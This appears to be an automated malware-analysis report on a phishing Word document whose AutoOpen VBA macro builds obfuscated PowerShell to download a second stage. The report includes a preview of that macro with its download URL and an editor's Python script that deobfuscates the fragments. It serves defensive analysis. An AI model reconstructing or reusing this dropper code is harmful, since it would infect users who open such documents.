Verdict: MALICIOUS (risk score 242)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document carrying a VBA macro that runs on AutoOpen. The macro calls Shell(), i.e. it hands a command to the operating system rather than staying inside Office, and the string fragments it assembles with Mid() are PowerShell ([chAr]NN+[chAr]NN runs, .RepLACe(...) chains, a foreach/try loop, and an apparent $pshome[21]+$pshome[34]+'x' construction, the usual way to spell "iex" without writing Invoke-Expression). The long arithmetic statements over undefined variables are padding: under On Error Resume Next they evaluate to nothing and exist only to dilute the signal for signature and heuristic scanners. The analyzer reconstructs 'http://www.wiganmb.com/mOOlU' as the likely second-stage download; treat that as unverified, because the hostname in the macro source is interleaved with concatenation tokens and a manual reading of the visible fragment yields a longer host. Confirm the indicator by deobfuscating the PowerShell (or by detonation) before blocking or pivoting on it. The AutoOpen trigger and the ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' are consistent with a downloader/dropper delivered as a phishing attachment.
Heuristics (7)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that every Office document carries, not a network indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 66615 bytes | b30fbad56110915eac534d7206dd0e2e0a24dc9bb3eec94280cbf7ee92da00b7 |
Preview: first 1,000 lines of the extracted script (obfuscated VBA, shown exactly as extracted and truncated by the analyzer)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rNBcrFSlB"
Function AoAEflDwjt()
On Error Resume Next
uIXiNz = (CRzOUiZAkAIL - CByte(KjMMtNCthn + Sin(61) + 18077887 / pwGmiTNlISrqZ)) + (82162758 - Sqr(GQIwVAhtEQ) / wVDjprVdK + Hex(VbmRRnWDET))
RwJjipR = (tcijPCrVQsq - CByte(LjRCfozcQKcbq + Sin(61) + 18077887 / dIuQLulK)) + (82162758 - Sqr(LbEpluUNkqnpi) / ahluAJiADtIYia + Hex(hwGBpFbawLhwzs))
oUzufwjUI = ljoGoEnmp + Mid("DcIrfGcchAr]84+[chAr]74),[stRING][chAr]124).RepLACe(([chAr]70+[chAr]108+[chAr]103),'$').RepLACe(([chAr]122+[chAr]90+[ch7K0liMiKLIALB1aQn2AinTz5", 8, 112) + cjfBLLcNZrc
TzzwwnPtSI = (nrmztzLmHvuqU - CByte(wJCSbVMPvloV + Sin(61) + 18077887 / DNLqzwcLdQm)) + (82162758 - Sqr(uJrDdalSiTdTlc) / dXwBIYSHZvFuts + Hex(UtQWhMVMRK))
PsXrTGWB = (klqQKvhCHnEMv - CByte(fbCUWPz + Sin(61) + 18077887 / bsWZmmnW)) + (82162758 - Sqr(NjMTsllOM) / iSXCEVnvc + Hex(SpctZKz))
UOomajGUo = (wkDOvlHL - CByte(qEUWXpEAXut + Sin(61) + 18077887 / odmwGKDFsiMd)) + (82162758 - Sqr(lznqbNrcBYZD) / icCYIwj + Hex(KGRQpbDGmLs))
pMlUj = DwkjrEX + Mid("AE8fuIzOOBAui4W5pLrtiuLcfYdphSRZp://wwPd0+Pd0w.wPd0+Pd'+'0iPzZB+zZBd0+Pd0zZB+zZBllarPd0+Pd0dzZB+zZBwiganmb'+'Pd0+Pd0e.com/'+'Pd0'+'+Pd0mOOlU", 33, 105) + wnjPdXbBRHYfrZ
TCNXckcZijW = (kIuPlYrfiinpRF - CByte(ATsEqREz + Sin(61) + 18077887 / LSvXETuinrdDU)) + (82162758 - Sqr(hwKYmEImm) / icajGHcj + Hex(EEScTbPo))
zfpIaZnawCY = (ZNAGLhcZQnoTk - CByte(pSvGVziCShvhU + Sin(61) + 18077887 / TIZztnGbS)) + (82162758 - Sqr(JwuTKQpPvFqKj) / bBHWvTLd + Hex(PFINpawiN))
RfoUQmSQWBQ = (sbsNbfOzuQKO - CByte(qzXQCjMkYw + Sin(61) + 18077887 / VAckOOVimt)) + (82162758 - Sqr(AWadWLiMPtw) / pvuifpTwUiWs + Hex(DijfvjcbPwB))
jFSwC = CZcGfEL + Mid("Iww8EKtcn3ho8nsPd0+Pd0adasd =P'+'d0+Pd0 Pd0+Pd0nPd0+Pd0ew-Kf", 12, 47) + fsRuiZj
WzIDiIIMjlY = (DwYFPsBrfmOWJb - CByte(Xrjjjzhfj + Sin(61) + 18077887 / NBDAowXcKdM)) + (82162758 - Sqr(wsitbfr) / svhwRjQwhzWRpa + Hex(rwqrnqu))
ipazripKHIX = (hZDqHtiwO - CByte(dSVAmzFErBpo + Sin(61) + 18077887 / nHKlkqL)) + (82162758 - Sqr(iBzXFwrfXcktd) / MjzDwDorlbt + Hex(PiwItICswQ))
JKQCoadjaA = (WrmvloDI - CByte(zjsvodsucUdFnj + Sin(61) + 18077887 / rGlFSznqJI)) + (82162758 - Sqr(wTrmNjboUl) / oQEfzimRH + Hex(IPDiCwqwJsjm))
lJwtuw = wEVunFmXBnjmRU + Mid("CO43mbBGOQd9lRRcKYRMCAr]66),[stRING][chAr]39)| &zKsfMjWi68JS7vZW", 22, 27) + jFiYuKHu
liAAazodm = (chDNYUYEuZ - CByte(viojsIEnQ + Sin(61) + 18077887 / iijIiPicql)) + (82162758 - Sqr(vLUWupPXMWw) / CnSTNPunLAzwwX + Hex(pEpcDom))
WaCWvELcC = (zKCinSu - CByte(uDRqtiwPojkj + Sin(61) + 18077887 / JNBVnrz)) + (82162758 - Sqr(msawjQni) / wJTBVsBEaQY + Hex(iYbzAqwBJzau))
TGYHwmTp = (MwzQuNWYWk - CByte(SWuuJQnzAC + Sin(61) + 18077887 / bwuwvRMtj)) + (82162758 - Sqr(IUPHqVFEzl) / hPzhHlcNiQv + Hex(uUwVwSELd))
jJkEbz = STKwSpQ + Mid("tml5cLCN56Pd0'+'zZB+zZB2Pd0+PdzZB+zZB0eQ;fo'+'reacPd0+Pd0h(Do8abzZB+zZBc Pd0+Pd0in Do8Pd0+Pd0bPd0+Pd0cd){t'+'Pd0+Pd0ry{Do8PdstRlKZ5", 11, 114) + BjldVQv
ndGijTKB = (IKqsNSIkKha - CByte(znUzQNbb + Sin(61) + 18077887 / HTzBfZqcUw)) + (82162758 - Sqr(YbNhKMMzPwTq) / kBCcCsm + Hex(TBArrrisSHqiro))
JKlTiZKbdP = (cvrnBNUvn - CByte(oTYzjnJWjhVjLT + Sin(61) + 18077887 / EzjWqXJ)) + (82162758 - Sqr(qlqLYdAXw) / UIcUDJQvj + Hex(zzwkYmzOlZwXiD))
YEFcZhQEP = (FzqdHJvdcpN - CByte(lUIcMOtaDVDjP + Sin(61) + 18077887 / GjwNwViVYN)) + (82162758 - Sqr(LVpVAuZNmaPw) / AcZvakuKNlCLiO + Hex(rGPwvtBsDEDai))
onkVNwJzOH = anoDAdLZod + Mid("flace Pd0Do8Pd0,[cHAr]36 -Replace([cH'+'Ar]112+[cHAr]114+[cHAr]116zZB+zZB),['+'cHAr]92) iOb&( s'+'d4pSHomE[21zZB+zZB]+sd4pshomE[34]+Pd8juiQ3LqV", 2, 134) + RiXOabMkEZMqTV
ERjlQ = (MtbktfJZNqKY - CByte(vaFvrPStoGnm + Sin(61) + 18077887 / mlXWwdYmrQp)) + (82162758 - Sqr(nOnYitNN) / TLTBjPkoX + Hex(owNtXCrthAzDJ))
hPiGdJA = (zjqUDNUNrWYzR - CByte(UdVhidmzjwbtq + Sin(61) + 18077887 / KnXELPnPsJwp)) + (82162758 - Sqr(ZoYuXDjsY) / w
... (truncated)
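The fragments above can be recovered by hand without executing anything. The following is an added example by the editor, not analyzer output or the sample's own code. It applies VBA Mid() semantics to two literals copied from the preview, renders the [chAr]NN runs so the PowerShell .RepLACe() calls become readable, and strips the string-concatenation tokens. The token list is an assumption read from the visible source: the preview itself contains `.RepLACe(([chAr]122+[chAr]90+[chAr]66),[stRING][chAr]39)` split across two fragments, i.e. Replace("zZB", "'"), so `zZB+zZB` is PowerShell `'+'`; `Pd0` is assumed to be replaced the same way, since its own Replace call is not in the visible part of the script. The URL the stripping yields differs from the analyzer's reconstruction and is shown only as a derivation from the preview text, not a confirmed indicator.

```python
"""Recover Mid()-sliced PowerShell fragments from the macro preview and strip
the concatenation placeholders.  Editor-added example; the placeholder tokens
are an assumption inferred from the visible (truncated) macro source."""
import re

# Literals copied verbatim from the preview (the oUzufwjUI and pMlUj lines),
# with the (start, length) arguments the macro passes to Mid().
FRAG_REPLACE_CHAIN = (
    "DcIrfGcchAr]84+[chAr]74),[stRING][chAr]124).RepLACe(([chAr]70+[chAr]108+[chAr]103),'$').RepLACe(([chAr]122+[chAr]90+[ch7K0liMiKLIALB1aQn2AinTz5",
    8, 112,
)
FRAG_URL = (
    "AE8fuIzOOBAui4W5pLrtiuLcfYdphSRZp://wwPd0+Pd0w.wPd0+Pd'+'0iPzZB+zZBd0+Pd0zZB+zZBllarPd0+Pd0dzZB+zZBwiganmb'+'Pd0+Pd0e.com/'+'Pd0'+'+Pd0mOOlU",
    33, 105,
)

# Assumed placeholders for PowerShell string concatenation ('+').  Order matters:
# the literal '+' comes first because it splits the other two tokens, and
# zZB+zZB is spliced inside Pd0+Pd0, so it has to go before Pd0+Pd0.
CONCAT_TOKENS = ("'+'", "zZB+zZB", "Pd0+Pd0")


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start index, returns at most `length` characters."""
    if start < 1 or length < 0:
        raise ValueError("Mid() requires start >= 1 and length >= 0")
    return s[start - 1:start - 1 + length]


def expand_char_codes(s: str) -> str:
    """Render runs like [chAr]70+[chAr]108+[chAr]103 as the quoted string 'Flg'."""
    def repl(m: re.Match) -> str:
        codes = re.findall(r"\[char\](\d+)", m.group(0), re.I)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return re.sub(r"(?:\[char\]\d+\+?)+", repl, s, flags=re.I)


def strip_concat_noise(s: str) -> str:
    """Remove the concatenation placeholders so the pieces read as one string."""
    for tok in CONCAT_TOKENS:
        s = s.replace(tok, "")
    return s


def carve_url(s: str):
    """Return (host, path) for the first scheme://host/path seen, or None."""
    m = re.search(r"://([A-Za-z0-9.\-]+)(/[A-Za-z0-9._~\-/]*)?", s)
    if not m:
        return None
    return m.group(1), m.group(2) or ""


def decode_fragment(frag) -> str:
    """Apply the macro's own Mid() slice, then make the PowerShell readable."""
    text, start, length = frag
    return strip_concat_noise(expand_char_codes(vba_mid(text, start, length)))


if __name__ == "__main__":
    print("replace chain:", decode_fragment(FRAG_REPLACE_CHAIN))
    # For the URL literal the whole string is stripped rather than only the
    # Mid() slice, because the preview may not be byte-exact with macros.bas.
    print("url fragment :", carve_url(strip_concat_noise(FRAG_URL[0])))
```

Run it against the real macros.bas (olevba output) rather than the on-page preview before treating any result as an indicator; the expected output is a host that ends in "wiganmbe.com" with the path "/mOOlU", which is what the stripped fragment reads as, not the "wiganmb.com" the analyzer reported.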